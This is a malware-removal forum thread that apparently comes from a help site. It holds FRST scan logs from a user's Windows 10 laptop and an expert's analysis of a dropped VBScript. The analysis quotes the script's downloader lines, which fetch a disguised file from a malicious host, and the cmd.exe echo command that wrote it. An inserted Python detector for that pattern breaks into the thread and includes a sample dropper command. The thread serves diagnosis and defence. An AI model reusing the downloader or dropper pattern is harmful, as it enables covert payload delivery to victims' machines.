    2017-01-10 17:37 - 2017-01-20 07:47 - 02829776 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\arwlib.dll
    2016-09-29 12:48 - 2016-09-29 12:48 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
    2017-02-01 08:44 - 2017-01-13 13:51 - 00023328 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\en-us\bdsystray.txtui
    2017-01-10 22:45 - 2016-12-21 01:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
    2017-01-10 22:46 - 2016-12-21 01:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)

    AlternateDataStreams: C:\Users\Joseph\Downloads\AdwCleaner.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\Firefox Setup Stub 51.0.1.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\FRST64.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\JRT (1).exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\JRT.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\mb3-setup-cb.NT-3.0.6.1469.exe:BDU [0]

    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="Service"

    ==================== Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)


    ==================== Hosts content: ===============================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2015-10-30 02:24 - 2017-02-01 21:28 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Control Panel\Desktop\\Wallpaper -> C:\windows\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg
    DNS Servers: 192.168.1.1
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==


    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [vm-monitoring-nb-session] => LPort=139
    FirewallRules: [{0308E923-8487-403F-B445-D15ED8CCCB95}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVD Cinema\PowerDVDCinema.exe
    FirewallRules: [{E42A29D0-C19D-4D1C-8FE2-D850981AEBA8}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe
    FirewallRules: [{29F940E0-B1B5-45D6-9E75-4BECF8FB67FC}] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe
    FirewallRules: [{B3262CE0-7120-40CC-B8E9-77C75A53DBCA}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe
    FirewallRules: [{F580D45B-9B87-4478-9D02-4FB5710B4EE2}] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe
    FirewallRules: [{6C97C639-83FE-4D5D-A976-D178E54ACEBA}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
    FirewallRules: [{D49EDF57-C52E-467F-A056-63D5BD0738D7}] => C:\Program Files\Intel Corporation\Intel WiDi\SmartAgentTest.exe
    FirewallRules: [{261EA2B7-45BC-4067-83D5-2418ADCEE9C8}] => C:\Program Files\Intel Corporation\Intel WiDi\Next\WirelessDisplay.exe
    FirewallRules: [{B59EE6A4-D725-4298-9685-DFD41B59B982}] => C:\Program Files\Intel Corporation\Intel WiDi\WiDiAppOld.exe
    FirewallRules: [{CF4CA95C-09CF-4959-9D76-68426CDA477D}] => C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe
    FirewallRules: [{080A3C37-1740-4E2C-815C-189C744E6E60}] => c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE
    FirewallRules: [{A9134569-28FB-4867-B6F4-AA1D2E5E15EE}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{0334F46F-ABB7-4487-AA0B-5C39528FE3FC}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{A0CD17AF-60E5-44AE-AC27-9328A673AC89}] => C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{970594D0-4429-4C70-838A-D147ED3FC01F}] => C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{DBA71186-0545-49C3-8B27-EF841C1940ED}] => C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
    FirewallRules: [{EA52B792-A898-4EF8-AD47-E12D2BF5BD0A}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\DeviceSetup.exe
    FirewallRules: [{A89935E6-6E46-4459-BA52-726242012FAF}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicator.exe
    FirewallRules: [{2C60681B-0038-4452-ADDE-3FC15C74708A}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicatorCom.exe
    FirewallRules: [{0790D2E9-EA09-4D41-BA01-B8BC78ECD5DA}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    FirewallRules: [{DDE9F5AC-0598-494C-89AB-659FD2D18BBB}] => C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
    FirewallRules: [{C5ABB8F3-9C6A-48E2-9E61-D7DFAF7B05F7}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
    FirewallRules: [{D4F608B2-F97B-4617-8A32-8CEA999C5E3D}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{C23C9D12-7310-4478-8E06-5C73C5D2AC72}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{F04FC8DC-884B-4DD1-8B0B-79F29AED26C0}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{009CC8D2-7203-4597-901D-185455F173D9}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{5151A207-2082-465F-96EB-697F284CEFD2}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{A75B0F26-5FC7-48B3-8D4D-90756AE6443A}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    FirewallRules: [{80B7AC85-64A5-4029-9123-68203C3004D3}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe

    ==================== Restore Points =========================

    15-01-2017 15:43:24 Installed TurboTax 2016 wrapper
    24-01-2017 15:52:44 Scheduled Checkpoint
    31-01-2017 20:53:13 end January 2017
    01-02-2017 17:15:49 JRT Pre-Junkware Removal
    01-02-2017 17:24:34 JRT Pre-Junkware Removal

    ==================== Faulty Device Manager Devices =============


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (02/01/2017 09:23:19 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.

    Error: (02/01/2017 09:20:30 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.

    Error: (02/01/2017 09:18:22 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: IntelCpHDCPSvc.exe, version: 1.0.0.1, time stamp: 0x572a4b65
    Faulting module name: ntdll.dll, version: 10.0.14393.479, time stamp: 0x5825887f
    Exception code: 0xc0000005
    Fault offset: 0x000000000002f7db
    Faulting process id: 0xd20
    Faulting application start time: 0x01d27cfa9f3c35eb
    Faulting application path: C:\WINDOWS\system32\IntelCpHDCPSvc.exe
    Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
    Report Id: a8ea9bde-d760-4dbc-832c-0766ee78aa5b
    Faulting package full name:
    Faulting package-relative application ID:

    Error: (02/01/2017 09:18:16 PM) (Source: DPTF) (EventID: 256) (User: )
    Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10608.329) TYPE: ERROR

    DPTF Build Version:  8.1.10608.329
    DPTF Build Date:  May 13 2016 11:00:20
    Source File:  ..\..\..\..\Sources\Policies\PolicyLib\PolicyBase.cpp @ line 673
    Executing Function:  PolicyBase::takeControlOfOsc
    Message:  Failed to acquire OSC: Failure during execution of _OSC:
    DPTF Build Version:  8.1.10608.329
    DPTF Build Date:  May 13 2016 11:00:20
    Source File:  ..\..\..\Sources\Manager\EsifServices.cpp @ line 473
    Executing Function:  EsifServices::primitiveExecuteSet
    Message:  Error returned from ESIF services interface function call
    Participant:  NoParticipant
    Domain:  NoDomain
    ESIF Primitive:  SET_OPERATING_SYSTEM_CAPABILITIES [93]
    ESIF Instance:  255
    ESIF Return Code:  ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]


    Policy:  Passive Policy 2 [2]

    Error: (02/01/2017 09:18:16 PM) (Source: DPTF) (EventID: 256) (User: )
    Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10608.329) TYPE: ERROR

    DPTF Build Version:  8.1.10608.329
    DPTF Build Date:  May 13 2016 11:00:20
    Source File:  ..\..\..\..\Sources\Policies\PolicyLib\PolicyBase.cpp @ line 673
    Executing Function:  PolicyBase::takeControlOfOsc
    Message:  Failed to acquire OSC: Failure during execution of _OSC:
    DPTF Build Version:  8.1.10608.329
    DPTF Build Date:  May 13 2016 11:00:20
    Source File:  ..\..\..\Sources\Manager\EsifServices.cpp @ line 473
    Executing Function:  EsifServices::primitiveExecuteSet
    Message:  Error returned from ESIF services interface function call
    Participant:  NoParticipant
    Domain:  NoDomain
    ESIF Primitive:  SET_OPERATING_SYSTEM_CAPABILITIES [93]
    ESIF Instance:  255
    ESIF Return Code:  ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]


    Policy:  Critical Policy [1]


    System errors:
    =============
    Error: (02/01/2017 09:28:02 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:58 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:54 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:50 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:46 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:42 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:38 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:34 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:30 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:26 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.


    CodeIntegrity:
    ===================================
      Date: 2017-02-01 21:18:20.909
      Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-02-01 21:18:20.659
      Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


    ==================== Memory info ===========================

    Processor: Intel® Core™ i7-6500U CPU @ 2.50GHz
    Percentage of memory in use: 20%
    Total physical RAM: 16273.91 MB
    Available physical RAM: 12875.87 MB
    Total Virtual: 18705.91 MB
    Available Virtual: 15290.62 MB

    ==================== Drives ================================

    Drive c: (Windows) (Fixed) (Total:913.93 GB) (Free:825.38 GB) NTFS
    Drive d: (RECOVERY) (Fixed) (Total:16.35 GB) (Free:1.88 GB) NTFS ==>[system with boot components (obtained from drive)]
    Drive e: (Disc1) (CDROM) (Total:1 GB) (Free:0 GB) UDF

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (Size: 931.5 GB) (Disk ID: D379171D)

    Partition: GPT.

    ==================== End of Addition.txt ============================


    • 0

    #8
    RKinner


      Malware Expert

    • Expert
    • 20,031 posts
    • MVP

    The 6ov.vbs was definitely a piece of malware. This is what it was trying to do:

     

    Dim drgfgd, jhgfsf  
    Set drgfgd = CreateObject("Microsoft.XMLHTTP")
    Set jhgfsf = CreateObject("Adodb.Stream")

    drgfgd.Open "GET", "http://disk.karelia....etBdl/996.png",False 

     

     

    It basically downloaded a file from http://disk.karelia.pro - when I clicked on the link in my own browser my Avast blocked my going there and said it was a malware site. Supposedly it is downloading a .png file, which should have been a picture, but it's easy to change the extension once you get the file, so it may have been a .exe or a compressed file with several exes in disguise. Scumware.org has some bad things to say about the site:

     

    https://www.scumware...isk.karelia.pro

     

    It does appear to be part of the malware discussed here:

     

    https://www.hybrid-a...vironmentId=100

     

    These lines created your 6ov.vbs file:

     

     

    cmd.exe cmd /c cd "%appdata%" &echo Dim drgfgd, jhgfsf >> 6ov.vbs &echo Set drgfgd = CreateObject("Microsoft.XMLHTTP")>> 6ov.vbs &echo Set jhgfsf = CreateObject("Adodb.Stream")>> 6ov.vbs &echo drgfgd.Open "GET", "http://disk.karelia....etBdl/996.png",False>> 6ov.vbs" (PID: 3672)

     

     

    Near as I can tell it is trying to install TeamViewer on your system so that someone can access it remotely.

     

    Run FRST again but this time put

    update_w32.exe;prtj.exe;svpn.exe;Book.xlt;Sheet.xlt

    (no spaces just a semicolon between the file names)

     

    in the box (you can copy the above line and paste it in if you want instead of typing it) then hit Search Files.  When it finishes, copy and paste the text from search.txt.

     

    Since you got the infection from an Excel file, it may have infected your default Excel template, so I'm also having it locate your default templates.

     

    Before I forget:  You have a bad block on your hard drive.  You need to run a disk check.   See the instructions on:

     

    http://www.thewindow...cking-windows-8

     

    Ignore the stuff with a vertical line.  That's just ads.  Skip over them.

     

    You also probably need a new driver for your Intel video.


    • 0
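The command line quoted in the post above writes a script to disk one `echo ... >>` line at a time. As an added example (not part of the original post, and not code from any tool named in this thread), the Python below rebuilds the dropped file from a process command line and flags the downloader pattern the post describes. The sample command lines are constructed, the URL is a placeholder, and the function and indicator names are hypothetical.

```python
import re

# Constructed sample modelled on the command line quoted in the post.
# The URL is a placeholder, not the one from the thread.
SAMPLE_CMDLINE = (
    'cmd.exe cmd /c cd "%appdata%" &echo Dim drgfgd, jhgfsf >> 6ov.vbs '
    '&echo Set drgfgd = CreateObject("Microsoft.XMLHTTP")>> 6ov.vbs '
    '&echo Set jhgfsf = CreateObject("Adodb.Stream")>> 6ov.vbs '
    '&echo drgfgd.Open "GET", "http://payload.example.invalid/996.png",False>> 6ov.vbs'
)
# Constructed benign command line that also appends with echo.
BENIGN_CMDLINE = 'cmd.exe /c cd "%temp%" &echo build started >> build.log &echo done >> build.log'

# One "echo <text> >> <file>" step of a cmd.exe chain.
ECHO_APPEND = re.compile(
    r'(?:^|[\s(])echo\s+(?P<text>.*?)\s*>>\s*(?P<file>"[^"]+"|[^\s"]+)', re.I
)

# Script-level indicators of a download-and-save stub (names are hypothetical).
INDICATORS = {
    "http_client": re.compile(r'CreateObject\(\s*"(?:Microsoft|MSXML2)\.(?:Server)?XMLHTTP', re.I),
    "binary_stream": re.compile(r'CreateObject\(\s*"Adodb\.Stream"', re.I),
    "http_get": re.compile(r'\.Open\s+"GET"\s*,\s*"(https?://[^"]+)"', re.I),
}
SCRIPT_EXTENSIONS = (".vbs", ".vbe", ".js", ".jse", ".wsf")
IMAGE_EXTENSIONS = (".png", ".jpg", ".jpeg", ".gif", ".bmp")


def split_commands(cmdline):
    """Split a cmd.exe command line on '&' separators that sit outside double quotes."""
    parts, buf, in_quotes = [], [], False
    i = 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == "^" and not in_quotes and cmdline[i + 1:i + 2] == "&":
            buf.append("&")  # '^&' is a literal ampersand, not a separator
            i += 2
            continue
        if ch == '"':
            in_quotes = not in_quotes
        if ch == "&" and not in_quotes:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
        i += 1
    parts.append("".join(buf))
    return [p.strip() for p in parts if p.strip()]


def reconstruct_dropped_files(cmdline):
    """Return {filename: text} rebuilt from the 'echo ... >> file' steps, in order."""
    files = {}
    for part in split_commands(cmdline):
        m = ECHO_APPEND.search(part)
        if m:
            name = m.group("file").strip('"').lower()
            files.setdefault(name, []).append(m.group("text"))
    return {name: "\n".join(lines) for name, lines in files.items()}


def analyze(cmdline):
    """Score every file the command line assembles; one finding per file."""
    findings = []
    for name, script in reconstruct_dropped_files(cmdline).items():
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(script))
        urls = INDICATORS["http_get"].findall(script)
        is_script = name.endswith(SCRIPT_EXTENSIONS)
        findings.append({
            "file": name,
            "hits": hits,
            "urls": urls,
            # A script fetching a URL that is named like a picture, as in the post.
            "image_named_urls": [
                u for u in urls if u.lower().split("?")[0].endswith(IMAGE_EXTENSIONS)
            ],
            # Flag only script files that create an HTTP client plus one more indicator.
            "suspicious": is_script and "http_client" in hits and len(hits) >= 2,
        })
    return findings


if __name__ == "__main__":
    for label, line in (("sample", SAMPLE_CMDLINE), ("benign", BENIGN_CMDLINE)):
        for finding in analyze(line):
            print(label, finding)
```
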

    #9
    mw201


      Member

    • Topic Starter
    • Member
    • 15 posts

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-01-2017
    Ran by Joseph (administrator) on JOSEPHW (02-02-2017 12:02:11)
    Running from C:\Users\Joseph\Downloads
    Loaded Profiles: Joseph (Available Profiles: Joseph)
    Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: Chrome)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe
    (Intel Corporation) C:\Windows\System32\igfxCUIService.exe
    (Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
    (Microsoft Corporation) C:\Windows\System32\wlanext.exe
    (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
    (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
    (Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
    (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
    (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
    (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
    (Intel Corporation) C:\Windows\SysWOW64\esif_uf.exe
    (Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
    () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
    (HP Inc.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
    (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
    (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
    Failed to access process -> IntelCpHDCPSvc.exe
    (WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
    (HP Inc.) C:\Program Files\HPCommRecovery\HPCommRecovery.exe
    (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
    (HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
    (Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
    (Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
    (Intel Corporation) C:\Windows\Temp\DPTF\esif_assist_64.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    (Intel Corporation) C:\Windows\System32\igfxEM.exe
    (Intel Corporation) C:\Windows\System32\igfxHK.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
    (HP Development Company, L.P.) C:\Program Files (x86)\HP\HP CoolSense\CoolSense.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
    (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe
    (Microsoft Corporation) C:\Windows\System32\msdt.exe
    (Microsoft Corporation) C:\Windows\System32\msdt.exe
    () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1701.10102.0_x64__8wekyb3d8bbwe\Calculator.exe
    (Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
    (Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe

    ==================== Registry (Whitelisted) ====================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9181696 2017-01-13] (Realtek Semiconductor)
    HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
    HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27262432 2016-12-20] (Skype Technologies S.A.)
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\Run: [HP Photosmart 6520 series (NET)] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)
    HKU\S-1-5-18\...\RunOnce: [Application Restart #0] => C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe [371928 2016-07-16] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    Startup: C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2016-10-31]
    ShortcutTarget: Send to OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation)

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
    Tcpip\..\Interfaces\{f314d896-c550-4d14-b773-fdf73ec6770f}: [DhcpNameServer] 192.168.1.1

    Internet Explorer:
    ==================
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
    BHO: Bitdefender Wallet  -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-01-13] (Bitdefender)
    BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-12-28] (Microsoft Corporation)
    BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-12-28] (Microsoft Corporation)
    BHO-x32: Bitdefender Wallet -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-01-13] (Bitdefender)
    BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-21] (HP Inc.)
    Toolbar: HKLM - Bitdefender Wallet  - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-01-13] (Bitdefender)
    Toolbar: HKLM-x32 - Bitdefender Wallet - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-01-13] (Bitdefender)
    Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
